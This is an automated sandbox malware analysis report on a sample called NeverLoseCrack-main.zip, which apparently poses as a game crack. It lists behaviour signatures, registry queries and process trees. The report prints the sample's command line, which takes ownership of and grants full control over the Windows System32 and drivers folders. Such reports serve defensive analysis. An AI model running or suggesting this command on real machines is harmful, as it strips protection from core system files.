Malware Analysis Report

2024-12-07 14:41

Sample ID 241006-1fx7ea1epa
Target NeverLoseCrack-main.zip
SHA256 d893667722ead622a8309c287f75d5e31aa8614db99ddf3866d1956d4ec83219
Tags
discovery evasion exploit persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d893667722ead622a8309c287f75d5e31aa8614db99ddf3866d1956d4ec83219

Threat Level: Known bad

The file NeverLoseCrack-main.zip was found to be: Known bad.

Malicious Activity Summary

discovery evasion exploit persistence

Modifies WinLogon for persistence

Possible privilege escalation attempt

Disables Task Manager via registry modification

Checks computer location settings

Modifies file permissions

Browser Information Discovery

Unsigned PE

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-06 21:36

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-06 21:36

Reported

2024-10-06 21:39

Platform

win10v2004-20240802-en

Max time kernel

150s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe"

Signatures

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2044 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe C:\Windows\System32\cmd.exe
PID 2044 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe C:\Windows\System32\cmd.exe
PID 3328 wrote to memory of 2900 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3328 wrote to memory of 2900 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3328 wrote to memory of 1092 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3328 wrote to memory of 1092 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3328 wrote to memory of 4008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3328 wrote to memory of 4008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3328 wrote to memory of 3400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3328 wrote to memory of 3400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2044 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2044 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 4880 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 4880 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 3192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 3192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 2132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 2132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 2132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 2132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 2132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 2132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 2132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 2132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=2jTr0Dq_kmE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4a0 0x2f4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=2jTr0Dq_kmE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

